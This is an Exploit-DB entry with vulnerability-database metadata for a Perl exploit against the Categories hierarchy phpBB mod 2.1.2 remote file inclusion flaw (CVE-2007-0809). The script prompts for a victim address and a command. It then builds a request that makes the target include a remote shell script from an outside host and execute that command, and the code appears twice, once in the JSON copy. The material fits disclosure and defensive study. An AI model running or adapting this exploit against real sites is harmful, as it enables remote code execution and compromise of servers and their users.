ID EDB-ID:3270
Type exploitdb
Reporter Mehmet Ince
Modified 2007-02-05T00:00:00
Description
Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit. CVE-2007-0809. Webapps exploit for php platform
# (C) xoron
#
# [Name: Categories hierarchy v2.1.2 (phpbb_root_path) Remote File Include Exploit]
#
# [Script name: Ptifo mod-CH_212_installed
#
# [Author: xoron]
# [Exploit coded by xoron]
#
# [Download: http://sourceforge.net/project/showfiles.php?group_id=125710]
#
# [xoron.biz - xoron.info]
#
# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]
#
# [Tesekkurler: chaos, pang0, DJR]
#
# [POC: /includes/class_template.php?phpbb_root_path=http://evilscripts?]
#
# [Vuln Codes: include($phpbb_root_path . 'includes/template.' . $phpEx); ]
#
#
$rfi = "class_template.php?phpbb_root_path=";
$path = "/includes/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) xoron\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoron\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Acýk Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) xoron.info - xoron.biz\n$thx: pang0, chaos, can bjorn\n";
sleep 3;
system("start $acacaz");
}
# milw0rm.com [2007-02-05]
{"bulletinFamily": "exploit", "id": "EDB-ID:3270", "cvelist": ["CVE-2007-0809"], "modified": "2007-02-05T00:00:00", "lastseen": "2016-01-31T18:06:06", "edition": 1, "sourceData": "# (C) xoron\n#\n# [Name: Categories hierarchy v2.1.2 (phpbb_root_path) Remote File Include Exploit]\n#\n# [Script name: Ptifo mod-CH_212_installed\n#\n# [Author: xoron]\n# [Exploit coded by xoron]\n#\n# [Download: http://sourceforge.net/project/showfiles.php?group_id=125710]\n#\n# [xoron.biz - xoron.info]\n#\n# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]\n#\n# [Tesekkurler: chaos, pang0, DJR]\n# \n# [POC: /includes/class_template.php?phpbb_root_path=http://evilscripts?]\n#\n# [Vuln Codes: include($phpbb_root_path . 'includes/template.' . $phpEx); ]\n#\n#\n$rfi = \"class_template.php?phpbb_root_path=\"; \n$path = \"/includes/\";\n$shell = \"http://pang0.by.ru/shall/pang057.zz?cmd=\";\nprint \"Language: English // Turkish\\nPlz Select Lang:\\n\"; $dil = <STDIN>; chop($dil);\nif($dil eq \"English\"){\nprint \"(c) xoron\\n\";\n&ex;\n}\nelsif($dil eq \"Turkish\"){\nprint \"Kodlayan xoron\\n\";\n&ex;\n}\nelse {print \"Plz Select Languge\\n\"; exit;}\nsub ex{\n$not = \"Victim is Not Vunl.\\n\" and $not_cmd = \"Victim is Vunl but Not doing Exec.\\n\"\nand $vic = \"Victim Addres? with start http:// :\" and $thx = \"Greetz \" and $diz = \"Dictionary?:\" and $komt = \"Command?:\"\nif $dil eq \"English\";\n$not = \"Adreste RFI acigi Yok\\n\" and $not_cmd = \"Adresde Ac\u0102\u02ddk Var Fakat Kod Calismiyor\\n\"\nand $vic = \"Ornek Adres http:// ile baslayan:\" and $diz = \"Dizin?: \" and $thx = \"Tesekkurler \" and $komt = \"Command?:\"\nif $dil eq \"Turkish\";\nprint \"$vic\";\n$victim = <STDIN>;\nchop($victim);\nprint \"$diz\";\n$dizn = <STDIN>;\nchop($dizn);\n$dizin = $dizn;\n$dizin = \"/\" if !$dizn;\nprint \"$komt\";\n$cmd = <STDIN>;\nchop($cmd);\n$cmmd = $cmd;\n$cmmd = \"dir\" if !$cmd;\n$site = $victim;\n$site = \"http://$victim\" if !($victim =~ /http/);\n$acacaz = \"$site$dizin$rfi$shell$cmmd\";\nprint \"(c) xoron.info - xoron.biz\\n$thx: pang0, chaos, can bjorn\\n\";\nsleep 3;\nsystem(\"start $acacaz\");\n}\n\n# milw0rm.com [2007-02-05]\n", "published": "2007-02-05T00:00:00", "href": "https://www.exploit-db.com/exploits/3270/", "osvdbidlist": ["33722"], "reporter": "Mehmet Ince", "hash": "1e5cc1098c33e1a4c4190c44a6f08c97802be28e54e529792e72a5c17c7ab9d5", "title": "Categories hierarchy phpBB Mod 2.1.2 phpbb_root_path RFI Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit. CVE-2007-0809. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3270/", "viewCount": 2, "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2007-0809", "type": "cve", "title": "CVE-2007-0809", "description": "PHP remote file inclusion vulnerability in includes/class_template.php in Categories hierarchy (aka CH or mod-CH) 2.1.2 in ptirhiikmods allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "published": "2007-02-07T06:28:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0809", "cvelist": ["CVE-2007-0809"], "lastseen": "2017-10-19T11:12:44"}], "osvdb": [{"id": "OSVDB:33722", "type": "osvdb", "title": "Categories hierarchy includes/class_template.php phpbb_root_path Variable Remote File Inclusion", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001285.html\nISS X-Force ID: 32193\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3270\nFrSIRT Advisory: ADV-2007-0493\n[CVE-2007-0809](https://vulners.com/cve/CVE-2007-0809)\nBugtraq ID: 22400\n", "published": "2007-02-05T02:11:46", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:33722", "cvelist": ["CVE-2007-0809"], "lastseen": "2017-04-28T13:20:30"}]}}
